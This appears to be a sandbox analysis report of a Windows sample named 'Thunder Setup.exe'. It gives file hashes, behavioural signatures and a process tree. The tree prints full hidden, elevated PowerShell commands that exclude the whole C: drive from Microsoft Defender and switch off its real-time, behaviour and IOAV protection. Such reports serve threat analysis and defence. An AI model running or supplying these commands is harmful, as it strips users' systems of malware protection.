Analysis
-
max time kernel
363s -
max time network
342s -
platform
windows11-21h2_x64 -
resource
win11-20240709-en -
resource tags
arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system -
submitted
14/07/2024, 22:14
Static task
static1
Behavioral task
behavioral1
Sample
Thunder Setup.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
Thunder Setup.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
Thunder Setup.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral4
Sample
Thunder Setup.exe
Resource
win11-20240709-en
General
-
Target
Thunder Setup.exe
-
Size
78KB
-
MD5
1eb797341e423c83060a36b92c720cc9
-
SHA1
380828212f0bb9a82d568491247a590a316e4351
-
SHA256
0842a46a5113b1ff571e62101c556565c853a0c0c792f7fdde57eb40e0256177
-
SHA512
9115d3a22f0163747de035273cd44caa84c46e17cd3fee863172e35688455def25e07bdbf7bdcec940dfd8bd2da7eb10e360d7f5a9413efc8c4b61ad4605c19b
-
SSDEEP
1536:aZ2FWSNhd/4131izmvch6oKnLzx9QAkhHQ40Gp/VS6:A2ddQ131izLh6oqLzHHuHQ40Gp/VT
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Run Powershell and hide display window.
pid Process 3372 Powershell.exe 2476 Powershell.exe 4328 Powershell.exe 3388 Powershell.exe 3372 Powershell.exe 228 powershell.exe 4492 powershell.exe 4468 powershell.exe 2752 powershell.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 3372 Powershell.exe 2476 Powershell.exe 4328 Powershell.exe 3388 Powershell.exe 3372 Powershell.exe 3388 Powershell.exe 2476 Powershell.exe 4328 Powershell.exe 4468 powershell.exe 2752 powershell.exe 228 powershell.exe 4468 powershell.exe 228 powershell.exe 4492 powershell.exe 2752 powershell.exe 4492 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 4328 Powershell.exe Token: SeDebugPrivilege 3388 Powershell.exe Token: SeDebugPrivilege 2476 Powershell.exe Token: SeDebugPrivilege 3372 Powershell.exe Token: SeDebugPrivilege 228 powershell.exe Token: SeDebugPrivilege 4468 powershell.exe Token: SeDebugPrivilege 2752 powershell.exe Token: SeDebugPrivilege 4492 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1260 javaw.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 3412 wrote to memory of 1260 3412 Thunder Setup.exe 82 PID 3412 wrote to memory of 1260 3412 Thunder Setup.exe 82 PID 3412 wrote to memory of 1260 3412 Thunder Setup.exe 82 PID 1260 wrote to memory of 3372 1260 javaw.exe 83 PID 1260 wrote to memory of 3372 1260 javaw.exe 83 PID 1260 wrote to memory of 3372 1260 javaw.exe 83 PID 1260 wrote to memory of 3388 1260 javaw.exe 84 PID 1260 wrote to memory of 3388 1260 javaw.exe 84 PID 1260 wrote to memory of 3388 1260 javaw.exe 84 PID 1260 wrote to memory of 4328 1260 javaw.exe 85 PID 1260 wrote to memory of 4328 1260 javaw.exe 85 PID 1260 wrote to memory of 4328 1260 javaw.exe 85 PID 1260 wrote to memory of 2476 1260 javaw.exe 86 PID 1260 wrote to memory of 2476 1260 javaw.exe 86 PID 1260 wrote to memory of 2476 1260 javaw.exe 86 PID 3372 wrote to memory of 228 3372 Powershell.exe 91 PID 3372 wrote to memory of 228 3372 Powershell.exe 91 PID 3372 wrote to memory of 228 3372 Powershell.exe 91 PID 2476 wrote to memory of 4468 2476 Powershell.exe 92 PID 2476 wrote to memory of 4468 2476 Powershell.exe 92 PID 2476 wrote to memory of 4468 2476 Powershell.exe 92 PID 3388 wrote to memory of 2752 3388 Powershell.exe 93 PID 3388 wrote to memory of 2752 3388 Powershell.exe 93 PID 3388 wrote to memory of 2752 3388 Powershell.exe 93 PID 4328 wrote to memory of 4492 4328 Powershell.exe 97 PID 4328 wrote to memory of 4492 4328 Powershell.exe 97 PID 4328 wrote to memory of 4492 4328 Powershell.exe 97
Processes
-
C:\Users\Admin\AppData\Local\Temp\Thunder Setup.exe"C:\Users\Admin\AppData\Local\Temp\Thunder Setup.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3412 -
C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe"C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\activation.jar;lib\antlr4-runtime.jar;lib\asm-all.jar;lib\commons-email.jar;lib\connector-api.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\dyn4j.jar;lib\gson.jar;lib\HikariCP-java6.jar;lib\javassist-GA.jar;lib\jaybird-jdk18.jar;lib\jfoenix.jar;lib\jkeymaster.jar;lib\jna.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-desktop-hotkey-ext.jar;lib\jphp-game-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-gui-jfoenix-ext.jar;lib\jphp-json-ext.jar;lib\jphp-jsoup-ext.jar;lib\jphp-mail-ext.jar;lib\jphp-runtime.jar;lib\jphp-sql-ext.jar;lib\jphp-systemtray-ext.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\jsoup.jar;lib\mail.jar;lib\mysql-connector-java.jar;lib\postgresql.jre7.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\sqlite-jdbc.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exePowershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Add-MpPreference -Force -ExclusionPath C:\' -Verb RunAs}"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3372 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -Force -ExclusionPath C:\4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:228
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exePowershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableBehaviorMonitoring ' -Verb RunAs}"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3388 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableBehaviorMonitoring4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2752
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exePowershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableIOAVProtection ' -Verb RunAs}"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4328 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableIOAVProtection4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4492
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exePowershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableRealtimeMonitoring ' -Verb RunAs}"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableRealtimeMonitoring4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4468
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5e080d58e6387c9fd87434a502e1a902e
SHA1ae76ce6a2a39d79226c343cfe4745d48c7c1a91a
SHA2566fc482e46f6843f31d770708aa936de4cc32fec8141154f325438994380ff425
SHA5126c112200ef09e724f2b8ab7689a629a09d74db2dcb4dd83157dd048cbe74a7ce5d139188257efc79a137ffebde0e3b61e0e147df789508675fedfd11fcad9ede
-
Filesize
15KB
MD516314c04a37cc6d058ee56b5d84d4314
SHA184755304afdefc5f46eabd968118e0e3d58ca445
SHA2562a9d5b2794ed96fd5d64251caa59246639e3e7396962799d301064f8bb6f2842
SHA512f6a49d5cb852bf646d229634bba46c635a3a3447c881995f1001e4412b0c488da8627c7671b6ce7395266a99ecfdebb23c214ddc9629e4870c84fc2b3ec46204
-
Filesize
15KB
MD552c9680010aca432dc3356400aa57c5d
SHA107bd979b1253bd8297c439f32fff951c9dbe843e
SHA2560035e88cf9be129b61bd5317e12d7bbcccbb3a4a4153a2f84929ccec1dd7ba89
SHA512a22e29fb4f8675761e3ffb711f636d3264baf6ef31c2bfa5fd3904d3839f5fefbe21650e3b14ce098b9cc4e158ec9146f177a3cdfebbc1d1c9d7401595290259
-
Filesize
18KB
MD5e6b946e8259524ea78190238b9b8d836
SHA18f7767914c5290c31017f267be36661481b4d67d
SHA2561567aff186a93c9bd2baf1e5c8b96f3df14dac44289533a0754110d569019e24
SHA51288b3ccd4b010a8823e77763c6724dab9ea3c453a6b3f0249842d08e4b342f7353a61384fd9ec6dd50c78d9161500d99685985031f2a16519ac3ea8f04ce14b4f
-
Filesize
18KB
MD5b934a085c6e1f7b4c8cd1a67bd393152
SHA1e06404354bb05aaac04137a8412b158ef0da4192
SHA256f42c303b5ffb4da3fadecae6fb4c7bdb2f31b6adeb9552a1bb63cd15ce74c14a
SHA512a513203f187b43236278c5ecbbf809e6c56e97ff1e9f541775aef5f597aca133586a5ff93776e9b19b0d02d47cf9df3706e3c1e5a650003915a32074324cd596
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82